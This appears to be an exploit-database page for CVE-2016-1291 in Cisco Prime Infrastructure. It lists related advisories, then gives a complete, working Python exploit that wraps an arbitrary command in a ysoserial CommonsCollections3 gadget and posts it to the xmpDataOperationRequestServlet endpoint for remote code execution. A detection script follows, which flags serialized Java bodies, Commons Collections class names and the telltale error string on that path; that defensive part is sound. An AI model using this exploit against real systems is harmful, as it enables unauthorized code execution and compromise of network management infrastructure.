| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Redhat Data_Grid | 15 Sep 2020 09:08 | – | gitee |
| Exploit for Deserialization of Untrusted Data in Ibm Sterling_B2B_Integrator | 3 Aug 2025 04:13 | – | gitee |
| Exploit for Deserialization of Untrusted Data in Redhat Data_Grid | 29 Oct 2020 13:31 | – | gitee |
| CVE-2016-1291 | 11 Dec 2023 13:42 | – | circl |
| Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerability | 6 Apr 2016 16:00 | – | cisco |
| Cisco Prime Infrastructure Java Deserialization RCE (cisco-sa-20160406-remcode) | 19 Apr 2016 00:00 | – | nessus |
| Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager Arbitrary Code Execution Vulnerabilities | 7 Apr 2016 00:00 | – | cnvd |
| Cisco Prime Infrastructure and EPNM Deserialization Code Execution (CVE-2016-1291) | 22 Aug 2016 00:00 | – | checkpoint_advisories |
| CVE-2016-1291 | 6 Apr 2016 23:00 | – | cve |
| CVE-2016-1291 | 6 Apr 2016 23:00 | – | cvelist |

```python
#! /usr/bin/env python2
# Cisco Prime Infrastructure Java Deserialization RCE (CVE-2016-1291)
# Based on the nessus plugin cisco_prime_infrastucture_20161291.nasl
# Made with <3 by @byt3bl33d3r
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import sys, os
from binascii import hexlify, unhexlify
from subprocess import check_output

ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
ysoserial_path = None

parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP:PORT')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='https', help='Send exploit over http or https (default: https)')
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')

if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

if not args.ysoserial_path:
    for path in ysoserial_default_paths:
        if os.path.exists(path):
            ysoserial_path = path
else:
    if os.path.exists(args.ysoserial_path):
        ysoserial_path = args.ysoserial_path

if ysoserial_path is None:
    print "[-] Could not find ysoserial JAR file"
    sys.exit(1)

if len(args.target.split(':')) != 2:
    print '[-] Target must be in format IP:PORT'
    sys.exit(1)

if not args.command:
    print '[-] You must specify a command to run'
    sys.exit(1)

ip, port = args.target.split(':')

print '[*] Target IP: {}'.format(ip)
print '[*] Target PORT: {}'.format(port)

# Java serialization stream header (aced 0005) followed by a block-data record holding a UTF string
payload = 'aced0005771d001b492068616420736f6d657468696e6720666f7220746869732e2e2e'
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])
# Skip the gadget's own 4-byte stream header, since the prefix above already supplies one
payload += hexlify(gadget[4:])

r = requests.post('{}://{}:{}/xmp_data_handler_service/xmpDataOperationRequestServlet'.format(args.proto, ip, port), verify=False, data=unhexlify(payload))

if r.status_code == 200 and 'InstantiateTransformer: Constructor threw an exception' in r.text:
    print '[+] Command executed successfully'
```
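
A detection-side counterpart to the script above, added here as an example and not part of the original page or of any vendor tooling: it flags POST requests to the servlet path the script uses whose body starts with the Java serialization stream header or names Commons Collections classes, and responses containing the error string the script checks for. The event layout (`method`, `path`, `body`, `response`), the finding labels and the sample transactions are assumptions constructed for illustration.

```python
# Added example (not from the original page). The event layout
# (method/path/body/response) is an assumption, not a real product's log format.
from urllib.parse import urlsplit

SERVLET = "/xmp_data_handler_service/xmpDataOperationRequestServlet"
JAVA_MAGIC = bytes.fromhex("aced0005")  # Java serialization stream header
RESPONSE_MARKER = "InstantiateTransformer: Constructor threw an exception"
# Package of the Commons Collections classes; class names appear in clear in the stream.
SUSPECT_CLASSES = (b"org.apache.commons.collections",)


def classify(event):
    """Return the list of findings for one HTTP transaction."""
    findings = []
    path = urlsplit(event["path"]).path  # ignore any query string
    body = event.get("body", b"")
    if event.get("method") == "POST" and path == SERVLET:
        if body.startswith(JAVA_MAGIC):
            findings.append("serialized-java-body")
        if any(name in body for name in SUSPECT_CLASSES):
            findings.append("commons-collections-class")
    if RESPONSE_MARKER in event.get("response", ""):
        findings.append("transformer-exception-in-response")
    return findings


def triage(events):
    """Map event index -> findings, keeping only events that matched something."""
    results = {}
    for index, event in enumerate(events):
        findings = classify(event)
        if findings:
            results[index] = findings
    return results


# Constructed sample transactions (not captured traffic).
SAMPLE_EVENTS = [
    {"method": "GET", "path": "/login", "body": b"", "response": "ok"},
    {"method": "POST", "path": SERVLET + "?x=1",
     "body": JAVA_MAGIC + b"\x77\x04test", "response": "error"},
    {"method": "POST", "path": SERVLET,
     "body": JAVA_MAGIC + b"sr" + b"org.apache.commons.collections.functors.Demo",
     "response": "500: " + RESPONSE_MARKER},
    {"method": "POST", "path": SERVLET, "body": b"<xml/>", "response": "ok"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Treat `serialized-java-body` on its own as context rather than an alert, on the assumption that this endpoint may also receive serialized objects in normal operation; the class-name and response findings are the stronger signals.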